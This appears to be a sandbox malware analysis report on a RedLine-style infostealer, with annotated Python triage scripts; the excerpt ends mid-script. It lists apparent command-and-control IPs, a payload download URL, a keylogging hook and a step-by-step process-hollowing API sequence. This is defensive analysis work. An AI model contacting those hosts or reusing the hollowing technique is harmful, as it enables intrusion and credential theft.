                      Source: Native_neworigin.exe, 00000013.00000002.2586371750.0000000006234000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://18.141.10.107/
                      Source: Native_neworigin.exe, 00000013.00000002.2586371750.0000000006234000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://18.141.10.107/nsnnyu
                      Source: Native_neworigin.exe, 00000013.00000002.2586371750.0000000006234000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://18.141.10.107:80/nsnnyu
                      Source: Native_neworigin.exe, 00000009.00000002.2403789034.0000000005169000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://44.221.84.105/jo
                      Source: Native_neworigin.exe, 00000009.00000002.2397017499.0000000000972000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://44.221.84.105/jo_
                      Source: Native_neworigin.exe, 00000013.00000002.2586371750.0000000006234000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://54.244.188.177/
                      Source: Native_neworigin.exe, 00000013.00000002.2586371750.0000000006234000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://54.244.188.177/QmKP
                      Source: Native_neworigin.exe, 00000013.00000002.2586371750.0000000006234000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://54.244.188.177/rmhPz
                      Source: Native_neworigin.exe, 00000009.00000002.2403789034.000000000518F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/$
                      Source: Native_neworigin.exe, 00000009.00000002.2431438104.0000000006990000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/J
                      Source: Native_neworigin.exe, 00000009.00000002.2431438104.0000000006990000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/epmanlipym
                      Source: Native_neworigin.exe, 00000009.00000002.2403789034.00000000051E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/epmanlipym~pJ
                      Source: Native_neworigin.exe, 00000009.00000002.2403789034.000000000518F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197:80/epmanlipymy
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: powershell.exe, 0000000B.00000002.2471994453.0000000003527000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                      Source: Native_neworigin.exe, 00000009.00000002.2403789034.00000000051E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.veris
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: powershell.exe, 0000000B.00000002.2613552915.0000000006226000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0C
                      Source: powershell.exe, 0000000B.00000002.2523044269.0000000005311000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: Native_neworigin.exe, 00000009.00000002.2403789034.000000000518F000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2398313780.0000000003049000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2431438104.00000000069B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r11.i.lencr.org/0
                      Source: Native_neworigin.exe, 00000009.00000002.2403789034.000000000518F000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2398313780.0000000003049000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2431438104.00000000069B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r11.o.lencr.org0#
                      Source: Native_neworigin.exe, 00000009.00000002.2398313780.0000000003041000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://s82.gocheapweb.com
                      Source: powershell.exe, 0000000B.00000002.2523044269.0000000005311000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: Native_neworigin.exe, 00000009.00000002.2398313780.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2523044269.00000000051C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 0000000B.00000002.2523044269.0000000005311000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 0000000B.00000002.2523044269.0000000005311000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: x.exe, x.exe, 00000002.00000002.2336563661.00000000224E2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2275324060.0000000020B62000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2070075040.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000002.2275324060.0000000020A90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2323160044.000000002217C000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000002.2434873297.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2323160044.000000002211E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000003.2070521735.000000007F920000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2191785418.0000000002C20000.00000004.00000020.00020000.00000000.sdmp, aymtmquJ.pif, 00000008.00000000.2159641261.0000000000416000.00000002.00000001.01000000.00000008.sdmp, Juqmtmya.PIF, 00000010.00000002.2348684542.0000000002D62000.00000004.00001000.00020000.00000000.sdmp, aymtmquJ.pif, 00000011.00000000.2324949898.0000000000416000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.pmail.com
                      Source: Native_neworigin.exe, 00000009.00000002.2403789034.000000000518F000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2398313780.0000000003049000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2431438104.00000000069B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                      Source: Native_neworigin.exe, 00000009.00000002.2403789034.000000000518F000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2398313780.0000000003049000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2431438104.00000000069B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                      Source: Native_neworigin.exe, 00000009.00000002.2398313780.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: powershell.exe, 0000000B.00000002.2523044269.00000000051C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: Native_neworigin.exe, 00000009.00000002.2398313780.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: Native_neworigin.exe, 00000009.00000002.2398313780.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: Native_neworigin.exe, 00000009.00000002.2398313780.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: powershell.exe, 0000000B.00000002.2613552915.0000000006226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000000B.00000002.2613552915.0000000006226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000000B.00000002.2613552915.0000000006226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 0000000B.00000002.2523044269.0000000005311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: x.exe, 00000002.00000002.2165746672.00000000007D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/
                      Source: x.exe, 00000002.00000002.2275324060.0000000020B9D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak2/233_Juqmtm
                      Source: x.exe, 00000002.00000002.2275324060.0000000020BB3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2165746672.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000002.2165746672.000000000076E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000002.2275324060.0000000020B88000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak2/233_Juqmtmyadyy
                      Source: x.exe, 00000002.00000002.2165746672.00000000007BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak2/233_Juqmtmyadyyc
                      Source: x.exe, 00000002.00000002.2165746672.00000000007B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak2/233_Juqmtmyadyyxev
                      Source: x.exe, 00000002.00000002.2165746672.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com:443/yak2/233_Juqmtmyadyy
                      Source: powershell.exe, 0000000B.00000002.2613552915.0000000006226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                      Source: unknownHTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.5:49705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49726 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49824 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49900 version: TLS 1.2
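A triage pass over the URL and TLS findings listed above, added here as an example and not part of the Joe Sandbox report. Most of the URL strings are not attacker infrastructure at all: the OCSP/CRL/CPS endpoints are pulled out of certificates embedded in the binaries (the trailing "0A", "0C", "0X", "0#" is the next DER length byte glued onto the string by the string scanner), the schemas.xmlsoap.org, Pester, contoso.com and nuget.org strings come from PowerShell module memory, and api.ipify.org and dyn.com are external-IP and dynamic-DNS services that stealers query but do not control. Only what is left after those allow-lists deserves a block or a hunt. The row list below is copied from the report with the memory-dump source column dropped; the allow-list suffixes and bucket names are this example's own assumptions.

```python
import re
from urllib.parse import urlsplit

# Findings copied from the report rows above, with the long memory-dump source
# column dropped. Constructed input for this example.
REPORT_ROWS = [
    "String found in binary or memory: http://ocsp.digicert.com0A",
    "String found in binary or memory: http://ocsp.sectigo.com0",
    "String found in binary or memory: http://r11.o.lencr.org0#",
    "String found in binary or memory: http://x1.i.lencr.org/0",
    "String found in binary or memory: https://sectigo.com/CPS0",
    "String found in binary or memory: http://pesterbdd.com/images/Pester.png",
    "String found in binary or memory: http://schemas.xmlsoap.org/wsdl/",
    "String found in binary or memory: https://contoso.com/License",
    "String found in binary or memory: https://nuget.org/nuget.exe",
    "String found in binary or memory: https://aka.ms/pscore6lB",
    "String found in binary or memory: http://www.pmail.com",
    "String found in binary or memory: http://s82.gocheapweb.com",
    "String found in binary or memory: https://account.dyn.com/",
    "String found in binary or memory: https://api.ipify.org/t",
    "String found in binary or memory: https://gxe0.com/yak2/233_Juqmtmyadyy",
    "String found in binary or memory: https://gxe0.com:443/yak2/233_Juqmtmyadyy",
    "HTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.5:49705 version: TLS 1.2",
    "HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49726 version: TLS 1.2",
    "HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49900 version: TLS 1.2",
]

# Allow-lists are this example's assumptions: host suffixes that explain a URL
# string without pointing at attacker infrastructure.
CERT_INFRA = ("digicert.com", "sectigo.com", "lencr.org")      # OCSP/CRL/CPS URLs carried inside certificates
TOOLING = ("schemas.xmlsoap.org", "pesterbdd.com", "github.com",
           "contoso.com", "nuget.org", "aka.ms", "apache.org",   # PowerShell module / .NET framework strings
           "pmail.com")                                          # vendor string seen in x.exe and the .pif copies
IP_LOOKUP = ("ipify.org", "dyn.com")                             # external-IP / dynamic-DNS services: behaviour, not C2

URL_RE = re.compile(r"String found in binary or memory: (\S+)")
TLS_RE = re.compile(r"HTTPS traffic detected: (\d{1,3}(?:\.\d{1,3}){3}):\d+ ->")
# A URL read out of a DER-encoded certificate is followed by the next length
# byte, which the string scanner glues on as "0", "0A", "0C", "0X" or "0#".
DER_TAIL_RE = re.compile(r"0[A-Z#]?$")


def clean_url(raw):
    """Strip the DER length-byte tail. Only safe for strings harvested from PE memory."""
    return DER_TAIL_RE.sub("", raw)


def host_in(host, suffixes):
    return any(host == s or host.endswith("." + s) for s in suffixes)


def triage(rows):
    """Bucket every URL/TLS finding; 'candidate' is what is left after the allow-lists."""
    buckets = {k: set() for k in ("cert_infra", "tooling", "ip_lookup",
                                  "candidate", "candidate_urls", "tls_servers")}
    for row in rows:
        m = TLS_RE.search(row)
        if m:
            buckets["tls_servers"].add(m.group(1))
            continue
        m = URL_RE.search(row)
        if not m:
            continue
        url = clean_url(m.group(1))
        host = urlsplit(url).hostname          # lower-cased, port dropped
        if not host:
            continue
        if host_in(host, CERT_INFRA):
            buckets["cert_infra"].add(host)
        elif host_in(host, TOOLING):
            buckets["tooling"].add(host)
        elif host_in(host, IP_LOOKUP):
            buckets["ip_lookup"].add(host)
        else:
            buckets["candidate"].add(host)
            buckets["candidate_urls"].add(url)
    return {k: sorted(v) for k, v in buckets.items()}


if __name__ == "__main__":
    for bucket, items in triage(REPORT_ROWS).items():
        print(f"{bucket:15} {items}")
```

Two caveats when reusing this: the DER-tail stripping would also clip a legitimate URL that ends in "0", so apply it only to strings extracted from binaries, never to proxy logs; and the TLS server addresses are weaker indicators than the hostnames, because 172.67.74.152 sits in Cloudflare's address space and will be shared with unrelated sites.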

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 9.2.Native_neworigin.exe.5850000.8.raw.unpack, cPKWk.cs | .Net Code: I3Mi2zn6x
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Window created: window name: CLIPBRDWNDCLASS

                      System Summary

Source: 19.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 24.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 24.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 19.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: Trading_AIBot.exe.8.dr, cfRDgxIJtEfCD.cs | Long String: Length: 17605
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | File dump: apihost.exe.10.dr 665670656
Source: C:\Windows\System32\wscript.exe | COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DC8670 NtUnmapViewOfSection
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DC8400 NtReadVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DC7A2C NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DCDC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DCDC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DC7D78 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DC8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DCDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DC7A2A NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DCDBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DC8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread
Source: C:\Users\Public\Libraries\Juqmtmya.PIF | Code function: 16_2_02CF8670 NtUnmapViewOfSection
Source: C:\Users\Public\Libraries\Juqmtmya.PIF | Code function: 16_2_02CF8400 NtReadVirtualMemory
Source: C:\Users\Public\Libraries\Juqmtmya.PIF | Code function: 16_2_02CF7A2C NtAllocateVirtualMemory
Source: C:\Users\Public\Libraries\Juqmtmya.PIF | Code function: 16_2_02CF7D78 NtWriteVirtualMemory
Source: C:\Users\Public\Libraries\Juqmtmya.PIF | Code function: 16_2_02CF8D70 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread
Source: C:\Users\Public\Libraries\Juqmtmya.PIF | Code function: 16_2_02CFDD70 NtOpenFile,NtReadFile,NtClose
Source: C:\Users\Public\Libraries\Juqmtmya.PIF | Code function: 16_2_02CF86F7 NtUnmapViewOfSection
Source: C:\Users\Public\Libraries\Juqmtmya.PIF | Code function: 16_2_02CF7AC9 NtAllocateVirtualMemory
Source: C:\Users\Public\Libraries\Juqmtmya.PIF | Code function: 16_2_02CF7A2A NtAllocateVirtualMemory
Source: C:\Users\Public\Libraries\Juqmtmya.PIF | Code function: 16_2_02CF8D6E Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread
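The native API chains listed above for x.exe (process 2) and its copy Juqmtmya.PIF (process 16) are the classic RunPE/process-hollowing sequence that the "Sample uses process hollowing technique" signature refers to: a child process is created, its image is unmapped with NtUnmapViewOfSection, fresh memory is allocated and the payload written with NtAllocateVirtualMemory/NtWriteVirtualMemory, the thread context is redirected with (Wow64)SetThreadContext, and the thread is resumed. The following Python, added as an example and not part of the report, parses "Code function" rows of this form, maps each API to a hollowing stage and reports per process which function addresses implement which stage, which is the list to pivot on in a disassembler. A Native_neworigin.exe row is included as a negative control. The stage table, the Zw*/WriteProcessMemory aliases and the verdict thresholds are this example's own choices.

```python
import re
from collections import defaultdict

# "Code function" rows transcribed from the report above with the trailing
# function-id column dropped. Constructed input: x.exe (process 2),
# Juqmtmya.PIF (process 16) and, as a negative control, a shortened
# Native_neworigin.exe (process 9) row.
CODE_FUNCTION_ROWS = [
    "Code function: 2_2_02DC8670 NtUnmapViewOfSection,",
    "Code function: 2_2_02DC8400 NtReadVirtualMemory,",
    "Code function: 2_2_02DC7A2C NtAllocateVirtualMemory,",
    "Code function: 2_2_02DCDC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,",
    "Code function: 2_2_02DC7D78 NtWriteVirtualMemory,",
    "Code function: 2_2_02DC8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,",
    "Code function: 2_2_02DCF7C8 InetIsOffline,CoInitialize,CoUninitialize,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,",
    "Code function: 16_2_02CF8670 NtUnmapViewOfSection,",
    "Code function: 16_2_02CF7A2C NtAllocateVirtualMemory,",
    "Code function: 16_2_02CF7D78 NtWriteVirtualMemory,",
    "Code function: 16_2_02CF8D70 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,",
    "Code function: 16_2_02CFDD70 NtOpenFile,NtReadFile,NtClose,",
    "Code function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,LoadLibraryA,GetProcAddress,",
]

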